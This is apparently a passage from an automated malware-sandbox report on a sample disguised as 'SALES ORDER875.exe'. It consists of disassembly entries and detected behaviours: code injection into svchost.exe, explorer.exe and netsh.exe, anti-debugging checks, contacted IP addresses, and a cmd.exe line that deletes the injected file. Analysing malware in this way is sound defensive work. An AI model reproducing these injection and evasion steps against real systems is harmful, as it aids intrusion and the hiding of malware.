          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0326A5D0 mov eax, dword ptr fs:[00000030h]1_2_0326A5D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0322E420 mov eax, dword ptr fs:[00000030h]1_2_0322E420
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0322E420 mov eax, dword ptr fs:[00000030h]1_2_0322E420
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0322E420 mov eax, dword ptr fs:[00000030h]1_2_0322E420
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0322C427 mov eax, dword ptr fs:[00000030h]1_2_0322C427
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B6420 mov eax, dword ptr fs:[00000030h]1_2_032B6420
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B6420 mov eax, dword ptr fs:[00000030h]1_2_032B6420
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B6420 mov eax, dword ptr fs:[00000030h]1_2_032B6420
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B6420 mov eax, dword ptr fs:[00000030h]1_2_032B6420
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B6420 mov eax, dword ptr fs:[00000030h]1_2_032B6420
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B6420 mov eax, dword ptr fs:[00000030h]1_2_032B6420
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B6420 mov eax, dword ptr fs:[00000030h]1_2_032B6420
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03268402 mov eax, dword ptr fs:[00000030h]1_2_03268402
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03268402 mov eax, dword ptr fs:[00000030h]1_2_03268402
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03268402 mov eax, dword ptr fs:[00000030h]1_2_03268402
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032BC460 mov ecx, dword ptr fs:[00000030h]1_2_032BC460
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0325A470 mov eax, dword ptr fs:[00000030h]1_2_0325A470
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0325A470 mov eax, dword ptr fs:[00000030h]1_2_0325A470
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0325A470 mov eax, dword ptr fs:[00000030h]1_2_0325A470
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0326E443 mov eax, dword ptr fs:[00000030h]1_2_0326E443
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0326E443 mov eax, dword ptr fs:[00000030h]1_2_0326E443
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0326E443 mov eax, dword ptr fs:[00000030h]1_2_0326E443
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0326E443 mov eax, dword ptr fs:[00000030h]1_2_0326E443
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0326E443 mov eax, dword ptr fs:[00000030h]1_2_0326E443
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0326E443 mov eax, dword ptr fs:[00000030h]1_2_0326E443
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0326E443 mov eax, dword ptr fs:[00000030h]1_2_0326E443
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0326E443 mov eax, dword ptr fs:[00000030h]1_2_0326E443
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032EA456 mov eax, dword ptr fs:[00000030h]1_2_032EA456
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0322645D mov eax, dword ptr fs:[00000030h]1_2_0322645D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0325245A mov eax, dword ptr fs:[00000030h]1_2_0325245A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032364AB mov eax, dword ptr fs:[00000030h]1_2_032364AB
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032644B0 mov ecx, dword ptr fs:[00000030h]1_2_032644B0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032BA4B0 mov eax, dword ptr fs:[00000030h]1_2_032BA4B0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032EA49A mov eax, dword ptr fs:[00000030h]1_2_032EA49A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032304E5 mov ecx, dword ptr fs:[00000030h]1_2_032304E5
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0325EB20 mov eax, dword ptr fs:[00000030h]1_2_0325EB20
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0325EB20 mov eax, dword ptr fs:[00000030h]1_2_0325EB20
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032F8B28 mov eax, dword ptr fs:[00000030h]1_2_032F8B28
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032F8B28 mov eax, dword ptr fs:[00000030h]1_2_032F8B28
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03304B00 mov eax, dword ptr fs:[00000030h]1_2_03304B00
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032AEB1D mov eax, dword ptr fs:[00000030h]1_2_032AEB1D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032AEB1D mov eax, dword ptr fs:[00000030h]1_2_032AEB1D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032AEB1D mov eax, dword ptr fs:[00000030h]1_2_032AEB1D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032AEB1D mov eax, dword ptr fs:[00000030h]1_2_032AEB1D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032AEB1D mov eax, dword ptr fs:[00000030h]1_2_032AEB1D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032AEB1D mov eax, dword ptr fs:[00000030h]1_2_032AEB1D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032AEB1D mov eax, dword ptr fs:[00000030h]1_2_032AEB1D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032AEB1D mov eax, dword ptr fs:[00000030h]1_2_032AEB1D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032AEB1D mov eax, dword ptr fs:[00000030h]1_2_032AEB1D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0322CB7E mov eax, dword ptr fs:[00000030h]1_2_0322CB7E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032E4B4B mov eax, dword ptr fs:[00000030h]1_2_032E4B4B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032E4B4B mov eax, dword ptr fs:[00000030h]1_2_032E4B4B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03302B57 mov eax, dword ptr fs:[00000030h]1_2_03302B57
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03302B57 mov eax, dword ptr fs:[00000030h]1_2_03302B57
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03302B57 mov eax, dword ptr fs:[00000030h]1_2_03302B57
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03302B57 mov eax, dword ptr fs:[00000030h]1_2_03302B57
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032C6B40 mov eax, dword ptr fs:[00000030h]1_2_032C6B40
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032C6B40 mov eax, dword ptr fs:[00000030h]1_2_032C6B40
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032FAB40 mov eax, dword ptr fs:[00000030h]1_2_032FAB40
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032D8B42 mov eax, dword ptr fs:[00000030h]1_2_032D8B42
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03228B50 mov eax, dword ptr fs:[00000030h]1_2_03228B50
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032DEB50 mov eax, dword ptr fs:[00000030h]1_2_032DEB50
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03240BBE mov eax, dword ptr fs:[00000030h]1_2_03240BBE
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03240BBE mov eax, dword ptr fs:[00000030h]1_2_03240BBE
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032E4BB0 mov eax, dword ptr fs:[00000030h]1_2_032E4BB0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032E4BB0 mov eax, dword ptr fs:[00000030h]1_2_032E4BB0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03238BF0 mov eax, dword ptr fs:[00000030h]1_2_03238BF0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03238BF0 mov eax, dword ptr fs:[00000030h]1_2_03238BF0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03238BF0 mov eax, dword ptr fs:[00000030h]1_2_03238BF0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0325EBFC mov eax, dword ptr fs:[00000030h]1_2_0325EBFC
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032BCBF0 mov eax, dword ptr fs:[00000030h]1_2_032BCBF0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03250BCB mov eax, dword ptr fs:[00000030h]1_2_03250BCB
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03250BCB mov eax, dword ptr fs:[00000030h]1_2_03250BCB
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03250BCB mov eax, dword ptr fs:[00000030h]1_2_03250BCB
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03230BCD mov eax, dword ptr fs:[00000030h]1_2_03230BCD
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03230BCD mov eax, dword ptr fs:[00000030h]1_2_03230BCD
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03230BCD mov eax, dword ptr fs:[00000030h]1_2_03230BCD
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032DEBD0 mov eax, dword ptr fs:[00000030h]1_2_032DEBD0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0326CA24 mov eax, dword ptr fs:[00000030h]1_2_0326CA24
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0325EA2E mov eax, dword ptr fs:[00000030h]1_2_0325EA2E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03254A35 mov eax, dword ptr fs:[00000030h]1_2_03254A35
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03254A35 mov eax, dword ptr fs:[00000030h]1_2_03254A35
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032BCA11 mov eax, dword ptr fs:[00000030h]1_2_032BCA11
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0326CA6F mov eax, dword ptr fs:[00000030h]1_2_0326CA6F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0326CA6F mov eax, dword ptr fs:[00000030h]1_2_0326CA6F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0326CA6F mov eax, dword ptr fs:[00000030h]1_2_0326CA6F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032DEA60 mov eax, dword ptr fs:[00000030h]1_2_032DEA60
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032ACA72 mov eax, dword ptr fs:[00000030h]1_2_032ACA72
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032ACA72 mov eax, dword ptr fs:[00000030h]1_2_032ACA72
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03236A50 mov eax, dword ptr fs:[00000030h]1_2_03236A50
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03236A50 mov eax, dword ptr fs:[00000030h]1_2_03236A50
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03236A50 mov eax, dword ptr fs:[00000030h]1_2_03236A50
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03236A50 mov eax, dword ptr fs:[00000030h]1_2_03236A50
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03236A50 mov eax, dword ptr fs:[00000030h]1_2_03236A50
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03236A50 mov eax, dword ptr fs:[00000030h]1_2_03236A50
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03236A50 mov eax, dword ptr fs:[00000030h]1_2_03236A50
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03240A5B mov eax, dword ptr fs:[00000030h]1_2_03240A5B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03240A5B mov eax, dword ptr fs:[00000030h]1_2_03240A5B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03238AA0 mov eax, dword ptr fs:[00000030h]1_2_03238AA0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03238AA0 mov eax, dword ptr fs:[00000030h]1_2_03238AA0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03286AA4 mov eax, dword ptr fs:[00000030h]1_2_03286AA4
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0323EA80 mov eax, dword ptr fs:[00000030h]1_2_0323EA80
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0323EA80 mov eax, dword ptr fs:[00000030h]1_2_0323EA80
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0323EA80 mov eax, dword ptr fs:[00000030h]1_2_0323EA80
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0323EA80 mov eax, dword ptr fs:[00000030h]1_2_0323EA80
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0323EA80 mov eax, dword ptr fs:[00000030h]1_2_0323EA80
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0323EA80 mov eax, dword ptr fs:[00000030h]1_2_0323EA80
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0323EA80 mov eax, dword ptr fs:[00000030h]1_2_0323EA80
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0323EA80 mov eax, dword ptr fs:[00000030h]1_2_0323EA80
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0323EA80 mov eax, dword ptr fs:[00000030h]1_2_0323EA80
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03304A80 mov eax, dword ptr fs:[00000030h]1_2_03304A80
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03268A90 mov edx, dword ptr fs:[00000030h]1_2_03268A90
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0326AAEE mov eax, dword ptr fs:[00000030h]1_2_0326AAEE
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0326AAEE mov eax, dword ptr fs:[00000030h]1_2_0326AAEE
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03286ACC mov eax, dword ptr fs:[00000030h]1_2_03286ACC
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03286ACC mov eax, dword ptr fs:[00000030h]1_2_03286ACC
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03286ACC mov eax, dword ptr fs:[00000030h]1_2_03286ACC
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03230AD0 mov eax, dword ptr fs:[00000030h]1_2_03230AD0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03264AD0 mov eax, dword ptr fs:[00000030h]1_2_03264AD0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03264AD0 mov eax, dword ptr fs:[00000030h]1_2_03264AD0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B892A mov eax, dword ptr fs:[00000030h]1_2_032B892A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032C892B mov eax, dword ptr fs:[00000030h]1_2_032C892B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032AE908 mov eax, dword ptr fs:[00000030h]1_2_032AE908
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032AE908 mov eax, dword ptr fs:[00000030h]1_2_032AE908
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032BC912 mov eax, dword ptr fs:[00000030h]1_2_032BC912
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03228918 mov eax, dword ptr fs:[00000030h]1_2_03228918
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03228918 mov eax, dword ptr fs:[00000030h]1_2_03228918
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03256962 mov eax, dword ptr fs:[00000030h]1_2_03256962
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03256962 mov eax, dword ptr fs:[00000030h]1_2_03256962
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03256962 mov eax, dword ptr fs:[00000030h]1_2_03256962
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0327096E mov eax, dword ptr fs:[00000030h]1_2_0327096E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0327096E mov edx, dword ptr fs:[00000030h]1_2_0327096E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0327096E mov eax, dword ptr fs:[00000030h]1_2_0327096E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032D4978 mov eax, dword ptr fs:[00000030h]1_2_032D4978
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032D4978 mov eax, dword ptr fs:[00000030h]1_2_032D4978
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032BC97C mov eax, dword ptr fs:[00000030h]1_2_032BC97C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B0946 mov eax, dword ptr fs:[00000030h]1_2_032B0946
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03304940 mov eax, dword ptr fs:[00000030h]1_2_03304940
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032429A0 mov eax, dword ptr fs:[00000030h]1_2_032429A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032429A0 mov eax, dword ptr fs:[00000030h]1_2_032429A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032429A0 mov eax, dword ptr fs:[00000030h]1_2_032429A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032429A0 mov eax, dword ptr fs:[00000030h]1_2_032429A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032429A0 mov eax, dword ptr fs:[00000030h]1_2_032429A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032429A0 mov eax, dword ptr fs:[00000030h]1_2_032429A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032429A0 mov eax, dword ptr fs:[00000030h]1_2_032429A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032429A0 mov eax, dword ptr fs:[00000030h]1_2_032429A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032429A0 mov eax, dword ptr fs:[00000030h]1_2_032429A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032429A0 mov eax, dword ptr fs:[00000030h]1_2_032429A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032429A0 mov eax, dword ptr fs:[00000030h]1_2_032429A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032429A0 mov eax, dword ptr fs:[00000030h]1_2_032429A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032429A0 mov eax, dword ptr fs:[00000030h]1_2_032429A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032309AD mov eax, dword ptr fs:[00000030h]1_2_032309AD
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032309AD mov eax, dword ptr fs:[00000030h]1_2_032309AD
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B89B3 mov esi, dword ptr fs:[00000030h]1_2_032B89B3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B89B3 mov eax, dword ptr fs:[00000030h]1_2_032B89B3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B89B3 mov eax, dword ptr fs:[00000030h]1_2_032B89B3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032BE9E0 mov eax, dword ptr fs:[00000030h]1_2_032BE9E0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032629F9 mov eax, dword ptr fs:[00000030h]1_2_032629F9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032629F9 mov eax, dword ptr fs:[00000030h]1_2_032629F9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032C69C0 mov eax, dword ptr fs:[00000030h]1_2_032C69C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0323A9D0 mov eax, dword ptr fs:[00000030h]1_2_0323A9D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0323A9D0 mov eax, dword ptr fs:[00000030h]1_2_0323A9D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0323A9D0 mov eax, dword ptr fs:[00000030h]1_2_0323A9D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0323A9D0 mov eax, dword ptr fs:[00000030h]1_2_0323A9D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0323A9D0 mov eax, dword ptr fs:[00000030h]1_2_0323A9D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0323A9D0 mov eax, dword ptr fs:[00000030h]1_2_0323A9D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032649D0 mov eax, dword ptr fs:[00000030h]1_2_032649D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032FA9D3 mov eax, dword ptr fs:[00000030h]1_2_032FA9D3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03252835 mov eax, dword ptr fs:[00000030h]1_2_03252835
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03252835 mov eax, dword ptr fs:[00000030h]1_2_03252835
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03252835 mov eax, dword ptr fs:[00000030h]1_2_03252835
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03252835 mov ecx, dword ptr fs:[00000030h]1_2_03252835
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03252835 mov eax, dword ptr fs:[00000030h]1_2_03252835
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03252835 mov eax, dword ptr fs:[00000030h]1_2_03252835
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0326A830 mov eax, dword ptr fs:[00000030h]1_2_0326A830
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032D483A mov eax, dword ptr fs:[00000030h]1_2_032D483A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032D483A mov eax, dword ptr fs:[00000030h]1_2_032D483A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032BC810 mov eax, dword ptr fs:[00000030h]1_2_032BC810
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032BE872 mov eax, dword ptr fs:[00000030h]1_2_032BE872
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032BE872 mov eax, dword ptr fs:[00000030h]1_2_032BE872
          Source: C:\Users\user\Desktop\SALES ORDER875.exeCode function: 0_2_003E0B62 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,0_2_003E0B62
          Source: C:\Windows\SysWOW64\svchost.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Users\user\Desktop\SALES ORDER875.exeCode function: 0_2_003B2622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_003B2622
          Source: C:\Users\user\Desktop\SALES ORDER875.exeCode function: 0_2_003A083F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_003A083F
          Source: C:\Users\user\Desktop\SALES ORDER875.exeCode function: 0_2_003A09D5 SetUnhandledExceptionFilter,0_2_003A09D5
          Source: C:\Users\user\Desktop\SALES ORDER875.exeCode function: 0_2_003A0C21 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_003A0C21
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_015696E0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_015696E0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_01569930 SetUnhandledExceptionFilter,4_2_01569930

          HIPS / PFW / Operating System Protection Evasion

          barindex
          Source: C:\Windows\explorer.exeNetwork Connect: 199.59.243.227 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 216.239.32.52 80Jump to behavior
          Source: C:\Users\user\Desktop\SALES ORDER875.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Windows\SysWOW64\netsh.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Windows\SysWOW64\netsh.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: read writeJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeThread register set: target process: 2580Jump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeThread register set: target process: 2580Jump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeThread APC queued: target process: C:\Windows\explorer.exeJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeSection unmapped: C:\Windows\SysWOW64\netsh.exe base address: 1560000Jump to behavior
          Source: C:\Users\user\Desktop\SALES ORDER875.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 5E8008Jump to behavior
          Source: C:\Users\user\Desktop\SALES ORDER875.exeCode function: 0_2_003E1201 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_003E1201
          Source: C:\Users\user\Desktop\SALES ORDER875.exeCode function: 0_2_003C2BA5 SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_003C2BA5
          Source: C:\Users\user\Desktop\SALES ORDER875.exeCode function: 0_2_003EB226 SendInput,keybd_event,0_2_003EB226
          Source: C:\Users\user\Desktop\SALES ORDER875.exeCode function: 0_2_004022DA GetForegroundWindow,GetDesktopWindow,GetWindowRect,mouse_event,GetCursorPos,mouse_event,0_2_004022DA
          Source: C:\Users\user\Desktop\SALES ORDER875.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\SALES ORDER875.exe"Jump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\SysWOW64\svchost.exe"Jump to behavior
          Source: C:\Users\user\Desktop\SALES ORDER875.exeCode function: 0_2_003E0B62 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,0_2_003E0B62
          Source: C:\Users\user\Desktop\SALES ORDER875.exeCode function: 0_2_003E1663 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,0_2_003E1663
          Source: SALES ORDER875.exeBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
          Source: SALES ORDER875.exe, explorer.exe, 00000003.00000003.3114628168.0000000009815000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4125666132.00000000018A1000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.1844128294.0000000009815000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd
